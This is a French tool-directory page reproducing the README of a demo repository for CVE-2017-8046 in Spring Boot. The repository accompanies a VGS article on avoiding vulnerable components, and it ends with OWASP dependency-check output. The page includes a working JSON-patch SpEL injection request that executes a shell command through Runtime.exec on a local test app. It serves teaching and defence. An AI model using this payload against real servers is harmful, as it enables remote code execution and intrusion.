Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2017-8046 — Démontre l'exploitation de CVE-2017-8046 dans une application Spring Boot, y compris une charge utile d'injection SpEL et la vérification par dépendance-check pour les composants vulnérables. | Kitploit
Outils/GitHubGitHub/bkhablenko/cve-2017-8046
Analyse des VulnérabilitésAnalyse de CodeExploitation d'Applications WebTests d'IntrusionSécurité de la Chaîne LogistiqueApprentissage et Éducation
GitHubbkhablenko/cve-2017-8046

CVE-2017-8046

Démontre l'exploitation de CVE-2017-8046 dans une application Spring Boot, y compris une charge utile d'injection SpEL et la vérification par dépendance-check pour les composants vulnérables.

Voir le dépôt
12il y a 7 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

VGS Logo

AVERTISSEMENT : Ce dépôt est complémentaire à l'article de blog VGS, Comment éviter d'utiliser des composants avec des vulnérabilités connues. Il contient une application avec une vulnérabilité de sécurité connue (à savoir, CVE-2017-8046), ainsi que la description de comment l'exploiter. Utilisez l'application à vos risques et périls !

Configuration

Tout d'abord, démarrez l'application en exécutant la commande suivante depuis la racine du dépôt :

root@kitploit:~
mvn clean spring-boot:run

Ensuite, créez une ressource en envoyant une requête POST comme ceci :

root@kitploit:~
curl -X POST http://localhost:8080/books \
  -H 'Content-Type: application/json' \
  -d '{"isbn":"978-3827268969","title":"Thinking in Java","author":"Bruce Eckel"}'

Exploitation de la vulnérabilité

root@kitploit:~
curl -X PATCH http://localhost:8080/books/1 -H 'Content-Type: application/json-patch+json' -d '[{"op":"replace","path":"T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(\"ifconfig\").getInputStream(),T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x","value":"Your application has been hacked"}]'

À condition que vous exécutiez l'application sur un système d'exploitation de type Unix (par ex. macOS), la réponse contiendra la configuration réseau de l'hôte. En fait, toute expression SpEL peut être utilisée.

Vérification des dépendances vulnérables

root@kitploit:~
mvn clean package verify

La compilation échouera car une dépendance a été identifiée comme présentant une vulnérabilité à haut risque :

root@kitploit:~
[ERROR] Failed to execute goal org.owasp:dependency-check-maven:3.3.2:check (default) on project CVE-2017-8046:
[ERROR]
[ERROR] One or more dependencies were identified with vulnerabilities that have a CVSS score greater than or equal to '7.0':
[ERROR]
[ERROR] spring-boot-1.5.5.RELEASE.jar: CVE-2017-8046
[ERROR] spring-core-4.3.10.RELEASE.jar: CVE-2018-1275, CVE-2018-1270
[ERROR] jackson-databind-2.8.9.jar: CVE-2017-15095, CVE-2017-17485, CVE-2018-7489
[ERROR] spring-boot-starter-data-rest-1.5.5.RELEASE.jar: CVE-2018-1273, CVE-2017-8046
[ERROR]
[ERROR] See the dependency-check report for more details.

Qu'est-ce que VGS ?

Vous voulez vous lancer directement ? Consultez notre guide de démarrage.

Very Good Security (VGS) vous permet d'améliorer votre posture de sécurité tout en conservant l'utilité de vos données en interne et avec des tiers. En prime, nous accélérons votre processus de certification de conformité et vous aidons à obtenir rapidement les conformités liées à la sécurité qui se dressent entre vous et vos opportunités de marché.

Pour en savoir plus, rendez-vous sur https://www.verygoodsecurity.com/

Licence

Ce projet est sous licence MIT. Voir le fichier LICENSE pour plus de détails.

Télécharger l’outil